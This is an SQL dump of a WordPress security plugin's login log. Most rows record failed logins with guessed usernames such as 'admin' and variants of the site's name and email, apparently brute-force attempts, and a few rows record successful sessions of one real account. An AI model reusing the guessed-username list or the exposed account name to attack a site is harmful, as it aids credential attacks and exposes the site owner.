(9938, 44359, 1704407690.810214, 1, 'loginFailInvalidUsername', 'WPADMIN', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ#À°ú', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9939, 44360, 1704407762.307549, 1, 'loginFailInvalidUsername', 'itsme', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ£M', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9940, 44361, 1704407786.152035, 1, 'loginFailInvalidUsername', 'itsme', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿY.m¬', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9941, 44362, 1704424323.948419, 1, 'loginFailInvalidUsername', 'administrator', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸAžM', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9942, 44363, 1704424324.651244, 1, 'loginFailInvalidUsername', 'wwwadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸAžM', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9943, 44363, 1704424324.667399, 1, 'loginFailInvalidUsername', 'wwwadmin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿŸAžM', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9944, 44364, 1704424372.542531, 1, 'loginFailInvalidUsername', 'dagon', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÒAX', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9945, 44365, 1704424373.249549, 1, 'loginFailInvalidUsername', 'yanz@123457', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÒAX', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9946, 44365, 1704424373.260795, 1, 'loginFailInvalidUsername', 'yanz@123457', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÒAX', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9947, 44366, 1704424415.423884, 1, 'loginFailInvalidUsername', 'admin6', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÙ¶­', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9948, 44367, 1704424416.237439, 1, 'loginFailInvalidUsername', 'wpuser', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÙ¶­', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9949, 44368, 1704424417.986397, 1, 'loginFailInvalidUsername', 'excontrol', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çƒ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9950, 44369, 1704424418.008158, 1, 'loginFailInvalidUsername', 'yeuthuongmongmanh', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çƒ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9951, 44370, 1704424481.187017, 1, 'loginFailInvalidUsername', 'wpadmins', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹…', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9952, 44371, 1704424481.790325, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹…', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9905, 44305, 1704333176.721389, 1, 'loginFailInvalidUsername', 'administrator', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-â', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9903, 44180, 1703957364.155760, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(9906, 44306, 1704333235.735465, 1, 'loginFailInvalidUsername', 'seomaster009', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÕÝ™´', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9902, 44059, 1703830055.605100, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥Ó¼', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9901, 44045, 1703781878.549263, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»ûr{', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),
(9904, 44181, 1703957487.203690, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'),
(9898, 43610, 1703103862.005220, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆÇ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9899, 43611, 1703103863.971788, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆÇ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9896, 43273, 1702487476.111009, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9897, 43274, 1702487891.033837, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9894, 43051, 1702230501.119224, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9895, 43052, 1702230877.377867, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9900, 43612, 1703103865.806468, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆÇ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(9907, 44307, 1704333236.413278, 1, 'loginFailInvalidUsername', 'maximixer789', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÕÝ™´', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9908, 44308, 1704333333.095703, 1, 'loginFailInvalidUsername', 'wpcore', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆ9÷ã', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9909, 44309, 1704333338.786347, 1, 'loginFailInvalidUsername', 'wpcore', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*p,', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9888, 42958, 1701981905.259707, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿRuÅv', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9887, 42935, 1701789031.057213, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ"`ƒ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),
(9889, 42959, 1701981910.266292, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg[Ü*', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0'),
(9885, 42910, 1701709349.788871, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ3ÛX¯', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9890, 42960, 1701981919.177992, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¢ÒŸ‚', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36'),
(9886, 42911, 1701709484.980941, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ3ÛX¯', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9881, 42639, 1701562052.924121, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb>Ú', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9891, 42961, 1701981927.232762, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ§ØY', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9882, 42650, 1701568003.674660, 1, 'loginFailInvalidUsername', 'happythinkingcom', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í@†', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),
(9883, 42827, 1701624103.230120, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9884, 42828, 1701624382.474511, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9892, 42974, 1702017535.977625, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9893, 42975, 1702017636.722936, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9910, 44310, 1704339364.856845, 1, 'loginFailInvalidUsername', 'itsme', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ6&Í½', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9911, 44312, 1704350782.784662, 1, 'loginFailInvalidUsername', 'smngrs952', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ")rÈ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9912, 44313, 1704350783.421137, 1, 'loginFailInvalidUsername', 'matakucing3', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ")rÈ', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9913, 44314, 1704350827.596853, 1, 'loginFailInvalidUsername', 'smngrs955', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹¹\Zr', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9914, 44315, 1704350828.027041, 1, 'loginFailInvalidUsername', 'pajero_sports', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹¹\Zr', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9915, 44316, 1704350872.602688, 1, 'loginFailInvalidUsername', 'smngrs953', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ­É¼¶', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9916, 44317, 1704350873.306278, 1, 'loginFailInvalidUsername', 'smngrs951', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ­É¼¶', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0'),
(9868, 42396, 1701470022.769835, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½Q', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9867, 42393, 1701466895.130329, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1«', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9869, 42398, 1701473712.710506, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½¾', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9870, 42403, 1701474278.631368, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb1£', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36'),
(9871, 42408, 1701474920.104394, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ6n', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),
(9872, 42409, 1701476595.482865, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ6n', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),
(9873, 42411, 1701479632.517724, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ!¨', 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9874, 42412, 1701482257.131098, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½K', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9875, 42426, 1701490825.819228, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ6n', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9876, 42431, 1701497139.981230, 1, 'loginFailInvalidUsername', '27gonzalo87terp9', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ©6¬', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9877, 42432, 1701497141.461597, 1, 'loginFailInvalidUsername', '27gonzalo87terp9', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ©6¬', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(9879, 42437, 1701502081.200599, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),
(9878, 42433, 1701497142.802401, 1, 'loginFailInvalidUsername', '27gonzalo87terp9', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ©6¬', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),
(10252, 49932, 1710871826.383300, 1, 'loginFailInvalidUsername', 'beescleaning', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµwAö', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),
(10253, 49940, 1710871852.733454, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ²€:j', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),
(10254, 49941, 1710871854.344236, 1, 'loginFailInvalidUsername', 'xylptj', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ''ib', 'Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),
(10274, 50165, 1711025769.689685, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑa‘^', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),
(10275, 50168, 1711025779.679740, 1, 'loginFailInvalidUsername', 'user', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÏ´Õ¹', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'),
(10276, 50171, 1711025790.069262, 1, 'loginFailInvalidUsername', 'scs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ+ðB3', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(10277, 50174, 1711025802.630533, 1, 'loginFailInvalidUsername', 'baivsbase', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\rC?Z', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(10343, 51112, 1712319182.774246, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨\0ê', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9428, 33203, 1694837341.271684, 1, 'loginFailInvalidUsername', 'study*20', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«áú¶', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),
(9429, 33204, 1694837350.727159, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÃ!ö', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9430, 33205, 1694837355.594761, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«ûîì', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),
(9431, 33206, 1694837360.486652, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¡X$', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9432, 33207, 1694837366.909773, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{Ž,', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9433, 33208, 1694837371.400370, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿeÿHæ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),
(9434, 33209, 1694837374.559120, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµs<X', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9435, 33209, 1694837374.574295, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµs<X', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36');
INSERT INTO `wpou_wflogins` VALUES
(9436, 33210, 1694837383.250366, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsIÒÆ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9437, 33211, 1694837389.006787, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsösÚ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),
(10344, 51113, 1712319195.130654, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼¤Ú ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10345, 51114, 1712319197.671167, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuÞ~¯', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10346, 51116, 1712319203.027893, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\c\r', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9378, 33159, 1694837036.649592, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´õ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9379, 33160, 1694837042.934202, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|+ý', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9380, 33161, 1694837046.298407, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ6Ô', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9381, 33162, 1694837053.401854, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$D7', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74'),
(9382, 33163, 1694837057.176111, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ.¦‚', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9383, 33164, 1694837061.010440, 1, 'loginFailInvalidUsername', 'chloe18123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±3', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),
(9384, 33165, 1694837072.054729, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿß{ä', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9385, 33165, 1694837072.064700, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿß{ä', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0'),
(9386, 33166, 1694837075.841497, 1, 'loginFailInvalidUsername', 'admin@happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{ï‡', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36'),
(9387, 33167, 1694837094.141390, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn‰&†', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36'),
(9388, 33168, 1694837116.712865, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÃ{tJ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'),
(9389, 33169, 1694837135.376814, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊXø‡', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),
(9390, 33170, 1694837139.271317, 1, 'loginFailInvalidUsername', 'chloe18', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq°ÃØ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36'),
(9391, 33171, 1694837146.198600, 1, 'loginFailInvalidUsername', 'password1!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsòŸþ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36'),
(9392, 33172, 1694837151.395315, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±ù<ö', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'),
(9393, 33173, 1694837155.375002, 1, 'loginFailInvalidUsername', 'lovely123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿzl', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74'),
(9394, 33174, 1694837160.131496, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ŸK‹', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),
